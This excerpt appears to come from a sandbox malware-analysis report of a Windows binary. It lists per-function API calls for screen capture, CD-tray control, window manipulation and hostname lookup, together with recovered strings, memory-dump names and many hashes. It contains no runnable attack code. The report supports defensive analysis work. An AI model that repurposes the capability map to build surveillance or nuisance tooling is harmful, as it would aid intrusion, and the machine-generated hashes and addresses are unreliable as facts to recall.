                                                                                                                    • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                                                                                    • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                                                                    • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                                                                                    APIs
                                                                                                                    • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                                                                                    • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                                                                                    • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoItemMenu$Sleep
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 1196289194-4108050209
                                                                                                                    • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                                                                                    • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                                                                                    • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                                                                                    • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                                                                                    APIs
                                                                                                                    • GetDC.USER32(00000000), ref: 0043143E
                                                                                                                    • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00431466
                                                                                                                    • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                                                                                    • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                                                                    • String ID: (
                                                                                                                    • API String ID: 3300687185-3887548279
                                                                                                                    • Opcode ID: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                                                                                    • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                                                                                    • Opcode Fuzzy Hash: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                                                                                    • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                                      • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                                                    • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                                                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                    • API String ID: 1976180769-4113822522
                                                                                                                    • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                                                    • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                                                                                    • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                                                    • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 461458858-0
                                                                                                                    • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                                                    • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
• Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
• Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
APIs
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
• GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
• GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
• GlobalLock.KERNEL32(00000000), ref: 004300F6
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
• GlobalUnlock.KERNEL32(00000000), ref: 0043010C
• CloseHandle.KERNEL32(00000000), ref: 00430113
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
• OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
• GlobalFree.KERNEL32(00000000), ref: 00430150
• GetObjectW.GDI32(?,00000018,?), ref: 00430177
• CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
• DeleteObject.GDI32(?), ref: 004301D0
• SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
Memory Dump Source
• Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
Similarity
• API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
• String ID:
• API String ID: 3969911579-0
• Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
• Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
• Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
• Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
APIs
Strings
Similarity
• API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
• String ID: 0
• API String ID: 956284711-4108050209
• Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
• Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
• Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
• Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
APIs
Strings
Similarity
• API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
• API String ID: 1965227024-3771769585
• Opcode ID: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
• Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
• Opcode Fuzzy Hash: fae7ff6cb08d49b7abbddf1c7acdf758c3bbd000e7fec019eac0b45bea4aa72c
• Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
APIs
  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
• mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
Strings
Similarity
• API ID: SendString$_memmove_wcslen
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
• API String ID: 369157077-1007645807
• Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
• Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
• Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
• Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
APIs
• GetParent.USER32 ref: 00445BF8
• GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
• __wcsicoll.LIBCMT ref: 00445C33
• __wcsicoll.LIBCMT ref: 00445C4F
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
Strings
Similarity
• API ID: __wcsicoll$ClassMessageNameParentSend
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 3125838495-3381328864
• Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
• Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
• Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
• Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
APIs
• SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
• SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
• CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
• SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
• SendMessageW.USER32(?,?,00000000,?), ref: 00449332
• SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
• SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
• SendMessageW.USER32(?,00000402,?), ref: 00449399
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
Similarity
• API ID: MessageSend$CharNext
• String ID:
• API String ID: 1350042424-0
• Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
• Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
• Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
• Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
APIs
  • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
  • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
• GetDriveTypeW.KERNEL32(?), ref: 004787B9
• _wcscpy.LIBCMT ref: 004787E5
Strings
Similarity
• API ID: BuffCharDriveLowerType_wcscpy_wcslen
• String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
• API String ID: 3052893215-2127371420
• Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
• Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
• Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
• Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
APIs
• LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
• LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
• __swprintf.LIBCMT ref: 0045E7F7
• _wprintf.LIBCMT ref: 0045E8B3
                                                                                                                    • _wprintf.LIBCMT ref: 0045E8D7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                                                    • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                    • API String ID: 2295938435-2354261254
                                                                                                                    • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                                                    • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                                                                                    • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                                                    • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                                                                    • String ID: %.15g$0x%p$False$True
                                                                                                                    • API String ID: 3038501623-2263619337
                                                                                                                    • Opcode ID: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                                                                                                                    • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                                                                                    • Opcode Fuzzy Hash: dbd07ee36d68efbdb82b47f6bbdb5a558a403895529f1bd62c5843a789ef215e
                                                                                                                    • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                                                                                    APIs
                                                                                                                    • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                    • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                                                                                    • __swprintf.LIBCMT ref: 0045E5F6
                                                                                                                    • _wprintf.LIBCMT ref: 0045E6A3
                                                                                                                    • _wprintf.LIBCMT ref: 0045E6C7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                                                    • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                    • API String ID: 2295938435-8599901
                                                                                                                    • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                                                                    • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                                                                                    • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                                                                    • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                                                                                    APIs
                                                                                                                    • timeGetTime.WINMM ref: 00443B67
                                                                                                                      • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                                                                                    • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 00443BC8
                                                                                                                    • SetActiveWindow.USER32(?), ref: 00443BEC
                                                                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                                                                                    • SendMessageW.USER32(?,00000010,00000000,00000000), ref: 00443C22
                                                                                                                    • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                                                                                    • IsWindow.USER32(?), ref: 00443C3A
                                                                                                                    • EndDialog.USER32(?,00000000), ref: 00443C4C
                                                                                                                      • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                                                      • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                                                      • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                                                    • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                                                                                    • String ID: BUTTON
                                                                                                                    • API String ID: 1834419854-3405671355
                                                                                                                    • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                                                    • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                                                                                    • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                                                    • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                                                                                    • LoadStringW.USER32(00000000), ref: 00454040
                                                                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                    • _wprintf.LIBCMT ref: 00454074
                                                                                                                    • __swprintf.LIBCMT ref: 004540A3
                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                    • API String ID: 455036304-4153970271
                                                                                                                    • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                                                    • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                                                                                    • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                                                    • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                                                                                    APIs
                                                                                                                    • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                                                                                    • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
